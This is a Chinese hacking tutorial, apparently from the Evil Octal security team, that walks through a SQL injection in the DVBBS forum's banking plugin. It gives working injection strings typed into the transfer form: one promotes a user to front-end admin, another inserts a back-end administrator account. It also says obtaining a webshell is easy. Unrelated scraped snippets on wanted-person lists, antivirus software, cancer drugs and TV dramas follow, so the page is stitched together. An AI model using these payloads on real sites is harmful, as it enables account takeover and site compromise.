文章作者:kon-bluesky信息来源:邪恶八进制信息安全团队 不知道这个漏洞以前是不是有过.不过即然我发现了.我就发表出来.跟大家一起学习下.利用的是动网的一个银行插件漏洞.如果是SQL版本的.并且用了这个插件.成功率很高.下面我就这个漏洞来详细的说明一个.文章所利用的网站.希望大家不要再破坏了.首先我们注册一个用户.这里我己经注册好了.我就不再注册了.用户名:kon-bluesky =800) window.open('/UpLoadFiles/NewsPhoto/71bd58db.jpg');" src="https://www.hack56.com/images/k5bjbqcnvau.jpg" onload="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';" border=0> 然后大家去社区银行里面.首先存一下款.要不然等会转账的时候会出现错误.存好之后.我们就来转账. =800) window.open('/UpLoadFiles/NewsPhoto/d4ee0e84.jpg');" src="https://www.hack56.com/images/yec5oxflu1v.jpg" onload="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';" border=0> 在后面写上这条语句:test1';update dv_user set usergroupid=1 where userid=107112-- (userid就是你注册的用户ID,可以在用户列表里面看到) 这条语句的作用是把我们注册的用户提升为前台管理员.成功之后.就是前台管理员了.然后再进行一次转账.跟上次一样的操作.不过语句不同了.提升为后台管理员语句:test1';Insert into Dv_admin(Password,Username,Adduser,Flag) values('49ba59abbe56e057','kon-bluesky','kon-bluesky','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36')-- (49ba59abbe56e057,MD5密码.根据自己所需进行改动.用户也是一样) 这条语句就是把kon-bluesky提升为后台管理员. =800) window.open('/UpLoadFiles/NewsPhoto/3a49d1eb.jpg');" src="https://www.hack56.com/images/tzmnxqcd4we.jpg" onload="if(this.width>'800')this.width='800';if(this.height>'800')this.height='800';" border=0> 至于怎么拿到WEBSHELL.就不在这篇文章的范围之内.很简单的.本地恢复就行了.由于之一次在八进制上面发表文章.不是很熟.所以有很多图片都没有发上来.
本文导读目录: 1、请问看网上通缉人员表该怎么看? 2、怎么可以查到所有网上通缉犯的名单??? 3、世界十大病毒排行榜 4、什么是网上通缉 5、网上通缉的具体内容是什么? 6、怎样...
小编来报:杀毒软件在保护设备免受恶意软件感染方面发挥着至关重要的作用。文章介绍了10大最佳安卓杀毒软件,一起来看看吧! 因为市场上充斥着许多假冒的杀毒软件,所以在选择杀毒软件时应该非常小心。最近的分...
不没收,但会暂时收缴,检查手机里的犯罪证据。检查完以后,跟其他个人物品放到一起。什么时候送进监狱了,会让家人把私人物品取回去。 行政处罚法第三十六条除本法第三十三条规定的可以当场作出的行政处罚外,行政...
奥希替尼又名泰瑞沙,用于治疗晚期非小细胞肺癌的一线治疗药物,于2017年经美国FDA食品和药物管理局批准上市,奥希替尼是一种口服小分子靶向药,能够针对特异性的靶点进行精确的打击,是目前治疗肺癌最为主流...
2019年已过去大半,这一年又追了哪些好看的电视剧呢?下面十部你是否看过呢? TOP1 陈情令 仙侠剧《陈情令》完全是一部古装美男集锦,主演: 肖战 、王一博、 孟子义。大家也被肖战饰演...
大家在制作ppt的时候,可能经常会用到简体字或者繁体字,有时候需要实现两者之间互相转换,对于一些不熟悉ppt的新手小白来说,可能并不知道PPT简体字和繁体字怎么转换吧,针对这个问题,现在给大家讲述一下...